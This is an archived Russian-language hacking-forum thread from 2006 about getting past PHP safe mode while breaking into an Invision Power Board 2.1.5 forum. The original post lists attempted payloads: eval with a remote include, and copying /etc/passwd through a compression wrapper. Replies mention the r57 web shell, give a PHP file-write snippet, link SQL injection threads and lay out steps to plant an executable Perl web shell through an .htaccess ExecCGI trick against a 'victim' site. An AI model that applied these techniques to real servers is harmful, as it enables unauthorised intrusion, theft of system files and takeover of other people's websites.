Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Обход Safe Mode прл взломе Invision Power board (https://forum.antichat.xyz/showthread.php?t=23630)

1ten0.0net1 07.09.2006 09:03

Обход Safe Mode прл взломе Invision Power board
 
Прошу совета - есть в наличии 2.1.5 IPB форум.
Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE.
Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <======
в созданном посте.
Пробовал:
eval (include(http://lalalal));//'
Пробовал eval(file_get_contents());//'
Пробовал
copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");
Пробовал обходить фильтрацию при помощи &#NN;
но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы.
Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете?
У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5

Заранее, благодарю.

SanyaX 07.09.2006 10:18

В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.

blackybr 07.09.2006 13:18

если на файле +w то иногда может прокатить

PHP код:

<?  
$file 
'';
$cont '';  
$handle fopen($filename'w');  
fwrite($handle$comecontent);  
fclose($handle);  
?>

$file – имя файла
$cont – то, что пишем в файл



https://forum.antichat.ru/thread17281-2.1.5+sql.html
https://forum.antichat.ru/thread18495-2.1.5+sql.html

MegaBits 20.12.2006 23:49

У меня таже проблема залил r57shell v 1.31 там есть несколько встроенных способов обхода, но не один не пашет, что можете посоветовать.

Zazil 22.12.2006 16:34

Попробуй следующим образом.
Находим директорию в которую можно писать и доступную по ввв.
Создаем там файл .htaccess со строчкой Options +ExecCGI внутри.
Заливаем шелл туда же какойнить перловый шелл.
Далее делаем ему chmod +x shell.cgi
Потом пытаемся вызвать его из броузера.
hxxt://victim.com/blablabla/shell.cgi

У меня получалось обойти safe_mode таким способом.


Время: 15:49